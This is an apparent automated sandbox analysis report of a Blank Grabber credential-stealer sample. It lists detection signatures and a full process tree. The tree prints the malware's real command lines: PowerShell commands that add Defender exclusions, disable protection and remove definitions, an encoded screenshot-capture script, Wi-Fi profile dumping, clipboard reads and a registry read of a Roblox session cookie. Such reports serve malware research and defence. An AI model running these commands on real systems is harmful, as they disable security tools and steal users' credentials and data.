Edit tour

Windows Analysis Report
El9HaBFrFM.exe

Overview

General Information

Sample name:	El9HaBFrFM.exe renamed because original name is a hash value
Original sample name:	cf691d4fccff15f697093ffc3b45d0e1c76725b701fb8f86ad39bcf444b770c6.exe
Analysis ID:	1546321
MD5:	9500da3f633857c71861d6af33820c12
SHA1:	8ecddcb17a72de8cc0a4f1bea277023cfe3f32ab
SHA256:	cf691d4fccff15f697093ffc3b45d0e1c76725b701fb8f86ad39bcf444b770c6
Tags:	AkeoConsultingexeuser-JAMESWT_MHT
Infos:

Detection

Blank Grabber

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

System process connects to network (likely due to code injection or exploit)

Yara detected Blank Grabber

Yara detected Telegram RAT

AI detected suspicious URL

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Found pyInstaller with non standard icon

Loading BitLocker PowerShell Module

Modifies Windows Defender protection settings

Modifies existing user documents (likely ransomware behavior)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Removes signatures from Windows Defender

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Rar Usage with Password and Compression Level

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: Suspicious Startup Folder Persistence

Suspicious powershell command line found

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses netsh to modify the Windows network and firewall settings

Writes or reads registry keys via WMI

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Connects to many different domains

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTML page contains hidden javascript code

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Sigma detected: Powershell Defender Exclusion

Sigma detected: SCR File Write Event

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Screensaver Binary File Creation

Stores files to the Windows start menu directory

Too many similar processes found

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

El9HaBFrFM.exe (PID: 7516 cmdline: "C:\Users\user\Desktop\El9HaBFrFM.exe" MD5: 9500DA3F633857C71861D6AF33820C12)

El9HaBFrFM.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\El9HaBFrFM.exe" MD5: 9500DA3F633857C71861D6AF33820C12)

cmd.exe (PID: 7596 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7748 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7604 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7692 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)

MpCmdRun.exe (PID: 7508 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)

cmd.exe (PID: 7700 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7932 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7708 cmdline: C:\Windows\system32\cmd.exe /c "start bound.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

bound.exe (PID: 7944 cmdline: bound.exe MD5: 42B9EB8BF1D2D2AABDA3977656AF4364)

chrome.exe (PID: 8768 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.trksyln.net/tgmacro/download MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1896,i,17984460610350237661,2584867532713279060,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cmd.exe (PID: 7740 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 7912 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

cmd.exe (PID: 7788 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7956 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7276 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6032 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7268 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7200 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7440 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 8132 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 3468 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7260 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7616 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 8320 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 8368 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8568 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 8380 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 8608 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cmd.exe (PID: 8396 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 8576 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

cmd.exe (PID: 8504 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8712 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 9184 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 9064 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD934.tmp" "c:\Users\user\AppData\Local\Temp\4mvljvuo\CSC4C1DA82D2D044571BEF9081AA72717.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

cmd.exe (PID: 8980 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 9036 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 9080 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 9092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 9132 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 9140 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 9164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

getmac.exe (PID: 8252 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)

cmd.exe (PID: 2132 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7784 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 9168 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 9112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8240 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 8012 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7440 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 8176 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

